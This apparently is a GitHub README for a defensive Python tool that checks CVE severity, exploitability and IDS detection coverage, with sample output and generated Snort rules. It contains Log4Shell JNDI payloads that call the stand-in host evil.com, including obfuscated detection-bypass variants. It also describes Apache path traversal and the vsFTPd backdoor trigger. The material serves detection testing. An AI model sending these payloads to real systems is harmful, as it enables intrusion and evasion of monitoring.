GitHub: krish-achanta/vuln-validator

# vuln-validator

![Python](https://img.shields.io/badge/Python-3.8%2B-blue) ![Platform](https://img.shields.io/badge/Platform-Linux%20%7C%20Kali-green) ![License](https://img.shields.io/badge/License-MIT-lightgrey)

## What This Tool Does — Plain English

Imagine you hear about a vulnerability called Log4Shell (CVE-2021-44228). Before patching or writing a detection rule, a security researcher needs to answer four questions:

1. **How bad is it?** → CVSS score, attack vector, affected products
2. **Can someone actually exploit it?** → Is there a public exploit? A Metasploit module? A PoC on GitHub? Is it being actively exploited in the wild?
3. **Would my IDS/firewall catch it?** → Does the attack payload match any known Snort/Suricata signatures?
4. **What am I missing?** → Which attack variants bypass detection? What should I fix?

`vuln-validator` answers all four questions automatically and puts them in an HTML report.

## The Two Ways to Use It

### Method 1: Give it a CVE ID

```bash
python3 vuln_validator.py --cve CVE-2021-44228 --test-detection --report
```

It fetches the full vulnerability details from the [NIST NVD database](https://nvd.nist.gov), checks exploitability signals, runs detection tests, and produces a gap analysis.

### Method 2: Give it a service banner

```bash
python3 vuln_validator.py --banner "Apache/2.4.49" --test-detection --report
```

A **service banner** is what a server tells you about itself when you connect to it. For example, when you run `nmap -sV` against a target, you see things like `Apache/2.4.49` or `OpenSSH_7.2p2`. This tool takes that string, looks it up against a local vulnerability database, finds which CVEs affect that exact version, and then runs the same detection tests.
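To make the banner step concrete, here is an added example (not vuln-validator's own code) of how a banner string can be normalised and matched against a local database. The database contents, the spelling aliases and the version-range comparison are assumptions; it goes slightly beyond the exact-version lookup described above by accepting an affected-version range per CVE.

```python
import re
from typing import Optional, Tuple

# Constructed local vulnerability database, NOT vuln-validator's real data file.
# canonical product -> [(first affected version, last affected version, CVE)]
LOCAL_DB = {
    "apache httpd": [("2.4.49", "2.4.49", "CVE-2021-41773"),
                     ("2.4.49", "2.4.50", "CVE-2021-42013")],
    "vsftpd": [("2.3.4", "2.3.4", "CVE-2011-2523")],
    "openssh": [],  # recognised product with no local mapping -> gap flag
}
# nmap and servers spell the same product differently; map spellings to one key.
ALIASES = {"apache": "apache httpd", "apache httpd": "apache httpd",
           "vsftpd": "vsftpd", "openssh": "openssh"}

# Accepts "Apache/2.4.49", "Apache httpd 2.4.49", "vsFTPd 2.3.4", "OpenSSH_7.2p2".
BANNER_RE = re.compile(r"^\s*([A-Za-z][\w .-]*?)[ /_]v?(\d+(?:\.\d+)*[a-z0-9]*)\s*$")

def parse_banner(banner: str) -> Optional[Tuple[str, str]]:
    """Return (canonical product, version string), or None if unrecognised."""
    m = BANNER_RE.match(banner)
    if not m:
        return None
    product = ALIASES.get(m.group(1).strip().lower())
    return (product, m.group(2)) if product else None

def version_key(version: str) -> tuple:
    """Split into numeric/alpha runs and tag each so ints never compare with
    strings: "7.2p2" -> ((1,7),(1,2),(0,'p'),(1,2)). Plain tuple order then
    gives 2.4.49 < 2.4.50 and 7.2 < 7.2p2 < 7.3."""
    return tuple((1, int(x)) if x.isdigit() else (0, x)
                 for x in re.findall(r"\d+|[a-z]+", version.lower()))

def match_cves(banner: str) -> dict:
    """Banner -> CVEs whose affected range contains the banner's version."""
    parsed = parse_banner(banner)
    if parsed is None:
        return {"banner": banner, "parsed": False, "cves": [], "gap": "unparsed banner"}
    product, version = parsed
    key = version_key(version)
    cves = [cve for lo, hi, cve in LOCAL_DB.get(product, [])
            if version_key(lo) <= key <= version_key(hi)]
    return {"banner": banner, "parsed": True, "product": product, "version": version,
            "cves": sorted(cves), "gap": None if cves else "no local CVE mapping"}

if __name__ == "__main__":
    for b in ("Apache/2.4.49", "Apache httpd 2.4.50", "vsFTPd 2.3.4", "OpenSSH_7.2p2"):
        print(match_cves(b))
```

A banner that parses but has no database entry (the OpenSSH case here) is reported as a gap rather than silently as "clean", which is the same distinction the tool's gap flag makes.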
## Installation

```bash
git clone https://github.com/krish-achanta/vuln-validator
cd vuln-validator
pip install -r requirements.txt
```

## Usage

```bash
# Validate a CVE with full detection testing and HTML report
python3 vuln_validator.py --cve CVE-2021-44228 --test-detection --report

# Analyse a service banner grabbed from nmap
python3 vuln_validator.py --banner "Apache/2.4.49" --test-detection --report

# Both together — useful when you know both the CVE and the target's banner
python3 vuln_validator.py --cve CVE-2021-41773 --banner "Apache/2.4.49" \
    --test-detection --report

# Offline mode — uses locally cached CVE data (no internet needed after first run)
python3 vuln_validator.py --cve CVE-2021-44228 --offline --test-detection --report

# Test against a live lab target (sends HTTP probes to the host)
python3 vuln_validator.py --cve CVE-2021-44228 --banner "Apache/2.4.49" \
    --target 192.168.1.10 --test-detection --report
```

### Arguments

| Argument | Description |
|----------|-------------|
| `--cve` | CVE ID to validate, e.g. `CVE-2021-44228` |
| `--banner` | Service banner string, e.g. `"Apache/2.4.49"` |
| `--target` | Optional IP/host for live HTTP detection tests |
| `--test-detection` | Simulate IDS/SIEM signature matching |
| `--report` | Generate HTML gap analysis report |
| `--offline` | Use cached CVE data only (no NVD API calls) |
| `-o` | Output directory (default: `reports/`) |

## CVEs You Can Test Right Now

The following CVEs have full detection signatures built in — you get detection test results, evasion analysis, and Snort rules generated automatically:

| CVE | Vulnerability | What it does |
|-----|--------------|-------------|
| `CVE-2021-44228` | **Log4Shell** | JNDI injection in Apache Log4j — one of the most critical CVEs ever found. Affects anything using Log4j 2.x |
| `CVE-2021-41773` | **Apache Path Traversal** | Apache 2.4.49 allows reading files outside the web root, e.g. `/etc/passwd` |
| `CVE-2014-6271` | **Shellshock** | Bash processes attacker-controlled commands in environment variables |
| `CVE-2014-0160` | **Heartbleed** | OpenSSL leaks server memory including private keys |
| `CVE-2017-0144` | **EternalBlue** | SMB exploit used by WannaCry ransomware — MS17-010 |
| `CVE-2020-1938` | **Ghostcat** | Apache Tomcat AJP port leaks/reads arbitrary files |
| `CVE-2011-2523` | **vsFTPd Backdoor** | vsFTPd 2.3.4 contains a deliberate backdoor triggered by `:)` in username |
| `CVE-2017-7494` | **SambaCry** | Samba arbitrary shared library load — Linux EternalBlue equivalent |

**For any other CVE** (e.g. `CVE-2023-44487`, `CVE-2022-30190`) you still get:

- Full CVSS score and severity from NVD
- Description and affected products
- Exploitability signals (Exploit-DB, Metasploit, GitHub PoC, CISA KEV)
- A gap flag noting no local detection signature exists

```bash
# Example — any CVE works for the NVD lookup + exploitability check
python3 vuln_validator.py --cve CVE-2023-44487 --report
# ^ HTTP/2 Rapid Reset DDoS — you'll get CVSS 7.5, references, exploitability check
```

## Real Sample Output

### Example 1 — Log4Shell + Apache banner

```
$ python3 vuln_validator.py --cve CVE-2021-44228 --banner "Apache/2.4.49" \
    --test-detection --report

[*] Looking up CVE-2021-44228 via NVD API...
[+] CVE      : CVE-2021-44228
[+] CVSS     : 10.0 (CRITICAL)
[+] CWE      : CWE-917, CWE-502
[+] CPEs     : 163 affected product entries
[+] Published: 2021-12-10

[*] Parsing banner: Apache/2.4.49
[+] Apache HTTP Server 2.4.49 → CVE-2021-42013, CVE-2021-41773

[*] Checking exploitability...
[+] Exploit-DB: 3 exploit(s) found for CVE-2021-44228
[+] Metasploit: 4 module file(s) reference CVE-2021-44228
[+] GitHub PoC: 5 repo(s) found (top: tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce)
[+] CISA KEV: ⚠ IN CISA KEV LIST — actively exploited in the wild

[*] Running detection gap tests...
[>] 3 test case(s) to evaluate
[+] Log4Shell JNDI Basic (CVE-2021-44228) → DETECTED | EVASION POSSIBLE
[+] Log4Shell JNDI RMI (CVE-2021-44228) → DETECTED
[+] Apache 2.4.49 Path Traversal (CVE-2021-41773) → DETECTED

════════════════════════════════════════════════════════════
VULNERABILITY VALIDATION SUMMARY
════════════════════════════════════════════════════════════
CVE          : CVE-2021-44228
Description  : Apache Log4j2 2.0-beta9 through 2.15.0 JNDI features...
CVSS Score   : 10.0 (CRITICAL)
Vector       : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
Published    : 2021-12-10
References   : 21 link(s)
Banner       : Apache/2.4.49
Matched CVEs : CVE-2021-42013, CVE-2021-41773
Exploit DB   : ✔ PUBLIC EXPLOIT EXISTS
Metasploit   : ✔ MODULE EXISTS
PoC GitHub   : ✔ PoC FOUND
CISA KEV     : ⚠ IN CISA KEV LIST
Risk Rating  : CRITICAL

Detection Gaps Found : 1
  ⚠ [MEDIUM] Log4Shell JNDI Basic: rule fires on base payload but 1 bypass variant evades detection.
    → Use obfuscation-aware PCRE rules.

Detection Coverage : [████████████████████░░░░] 93%
════════════════════════════════════════════════════════════
[+] Report: reports/CVE_2021_44228_20260525/gap_report_CVE_2021_44228.html
```

### Example 2 — Shellshock (CVE-2014-6271)

```
$ python3 vuln_validator.py --cve CVE-2014-6271 --test-detection --report

[*] Checking exploitability for CVE-2014-6271...
[*] Running detection gap tests...
[>] 1 test case(s) to evaluate
[+] Shellshock Basic (CVE-2014-6271) → DETECTED

Detection Coverage : [████████████████████] 100%
```

### Example 3 — EternalBlue (CVE-2017-0144)

```
$ python3 vuln_validator.py --cve CVE-2017-0144 --test-detection --report

[!] EternalBlue SMB Negotiation (CVE-2017-0144) → NOT DETECTED

Detection Gaps Found : 1
  ⚠ [HIGH] No IDS signature available — CVE has no detection test in the local signature library.
    → Develop a custom Snort/Suricata rule.

Detection Coverage : [██████████░░░░░░░░░░] 50%
```

EternalBlue shows up as NOT DETECTED because the detection test requires raw SMB packet inspection — a Snort rule for it is generated in the output, but the simulation engine can't fire on SMB binary data without a real packet. This is itself a valid finding: it correctly identifies a detection gap.

### Example 4 — Service banner from nmap output

```
$ python3 vuln_validator.py --banner "vsFTPd 2.3.4" --test-detection --report

[*] Parsing banner: vsFTPd 2.3.4
[+] vsFTPd 2.3.4 → CVE-2011-2523
[*] Running detection gap tests...
[+] vsFTPd 2.3.4 Backdoor Trigger (CVE-2011-2523) → DETECTED

Detection Coverage : [████████████████████] 100%
```

`vsFTPd 2.3.4` is famous — it contains a deliberate backdoor. Anyone connecting to it and sending a username ending in `:)` gets a root shell on port 6200. The detection signature correctly identifies it.

## Understanding the Gap Analysis

The gap analysis scores **7 detection checks** and combines them into a coverage percentage:

**Check 1 — Exploit-DB coverage.** Does a public exploit exist AND would your IDS fire on it? If Exploit-DB has an exploit but detection missed it → GAP flagged.

**Check 2 — Metasploit coverage.** Is there an MSF module AND would it be caught? Metasploit payloads have specific signatures — some IDS rulesets miss them.

**Check 3 — CISA KEV + detection.** Is this vulnerability actively being exploited in the wild (CISA KEV list)? If yes AND detection failed → CRITICAL gap.

**Check 4 — Evasion bypass.** Does obfuscating the payload (e.g. URL encoding, case variation, nested substitution) bypass the detection rule?
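Check 4 is the one worth seeing in code. The following added example (not part of vuln-validator) replays the generated `content:"${jndi:"` rule against the base Log4Shell payload and the obfuscated variants named above, then shows a normaliser and an obfuscation-aware PCRE that close the gap. The "cased" and "encoded" variant strings are constructed here; the base and nested ones are the README's own.

```python
import re
from urllib.parse import unquote

# Constructed test payloads: the README's two check-4 strings plus the
# case-variation and URL-encoding evasions it names.
VARIANTS = {
    "base":    "${jndi:ldap://evil.com/a}",
    "nested":  "${${::-j}${::-n}${::-d}i:ldap://evil.com/a}",
    "cased":   "${JnDi:ldap://evil.com/a}",
    "encoded": "%24%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fa%7D",
}

def naive_rule(payload: str) -> bool:
    """What the generated rule does: content:"${jndi:" is an exact substring test."""
    return "${jndi:" in payload

# Log4j's default-value lookup "${::-x}" evaluates to the literal x. The regex is
# applied until nothing changes so nested wrappers collapse completely.
_LOOKUP = re.compile(r"\$\{::-(.)\}")

def normalise(payload: str) -> str:
    """Undo the layers an attacker can add before the string reaches Log4j."""
    text = unquote(payload)
    prev = None
    while prev != text:
        prev, text = text, _LOOKUP.sub(lambda m: m.group(1), text)
    return text.lower()

def aware_rule(payload: str) -> bool:
    """Same substring test, but on the normalised form."""
    return naive_rule(normalise(payload))

# Obfuscation-aware PCRE in the spirit of the README's fix advice: each letter of
# "jndi" may appear literally or as a ${::-x} lookup, matched case-insensitively.
AWARE_PCRE = re.compile(
    r"\$\{(?:\$\{::-j\}|j)(?:\$\{::-n\}|n)(?:\$\{::-d\}|d)(?:\$\{::-i\}|i):", re.I)

def pcre_rule(payload: str) -> bool:
    """PCRE after URL decoding (what an HTTP-normalising IDS buffer would see)."""
    return AWARE_PCRE.search(unquote(payload)) is not None

def coverage(rule) -> tuple:
    """Return (names of variants that evaded the rule, detection coverage %)."""
    evaded = [name for name, p in VARIANTS.items() if not rule(p)]
    pct = round(100 * (len(VARIANTS) - len(evaded)) / len(VARIANTS))
    return evaded, pct

if __name__ == "__main__":
    for name, rule in (("naive", naive_rule), ("normalised", aware_rule), ("pcre", pcre_rule)):
        print(name, coverage(rule))
```

The naive rule scores 25% over these four variants (only the base form fires); both obfuscation-aware forms score 100%, which is the gap-to-fix transition the coverage percentage is meant to surface.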
Example:

```
${jndi:ldap://evil.com/a}                      → DETECTED
${${::-j}${::-n}${::-d}i:ldap://evil.com/a}    → NOT DETECTED  ← GAP
```

**Check 5 — No signature at all.** CVE exists and has exploits but zero detection rules cover it.

**Check 6 — High CVSS + no detection.** CVSS score ≥ 7.0 but no detection test was available.

**Check 7 — Public PoC + detection gap.** PoC exists on GitHub but detection may not cover all PoC variants.

**Coverage % = weighted average of passed checks + detection test pass rate**

A score of 100% means every known attack vector for that CVE would be caught by the generated Snort rules. 50% means half would slip through.

## Generated Snort/Suricata Rules

Every `--test-detection` run outputs a `.rules` file you can load into Snort or Suricata:

```
# vuln-validator generated Snort/Suricata rules
# Review and tune before deploying to production
alert tcp any any -> any any ( msg:"CVE-2021-44228 - Log4Shell JNDI Basic"; content:"${jndi:"; classtype:attempted-admin; sid:9067573; rev:1; )
alert tcp any any -> any any ( msg:"CVE-2021-44228 - Log4Shell JNDI RMI"; content:"jndi:rmi"; classtype:attempted-admin; sid:9016568; rev:1; )
alert tcp any any -> any any ( msg:"CVE-2021-41773 - Apache 2.4.49 Path Traversal"; content:".%2e/"; pcre:"/\.%2e\/.*etc\/passwd/i"; classtype:attempted-admin; sid:9088064; rev:1; )
```

To test these in Suricata on Kali:

```bash
suricata -c /etc/suricata/suricata.yaml \
    -S reports/CVE_2021_44228_20260525/detection_rules.rules \
    -r your_pcap_file.pcap
```

## Output Structure

```
reports/
└── CVE_2021_44228_20260525_070509/
    ├── CVE-2021-44228_nvd.json          ← Raw NVD API response (CVSS, CPEs, refs)
    ├── banner_match.json                ← Banner parse results
    ├── detection_results.json           ← Per-test detection pass/fail + evasion
    ├── detection_rules.rules            ← Generated Snort/Suricata rules
    └── gap_report_CVE_2021_44228.html   ← Full HTML report (open in Firefox)
```

## How to Use the Banner (nmap workflow)

A typical penetration test workflow combining nmap and vuln-validator:

```bash
# Step 1 — Scan the target with nmap service detection
nmap -sV 192.168.1.10
# nmap output shows:
# 21/tcp open ftp     vsftpd 2.3.4
# 80/tcp open http    Apache httpd 2.4.49
# 22/tcp open ssh     OpenSSH 7.2p2

# Step 2 — Feed each banner into vuln-validator
python3 vuln_validator.py --banner "vsftpd 2.3.4" --test-detection --report
python3 vuln_validator.py --banner "Apache/2.4.49" --test-detection --report
python3 vuln_validator.py --banner "OpenSSH_7.2p2" --test-detection --report

# Step 3 — Open the HTML reports in Firefox
firefox reports/*/gap_report_*.html
```

## Legal Disclaimer

## Author

[krish-achanta](https://github.com/krish-achanta)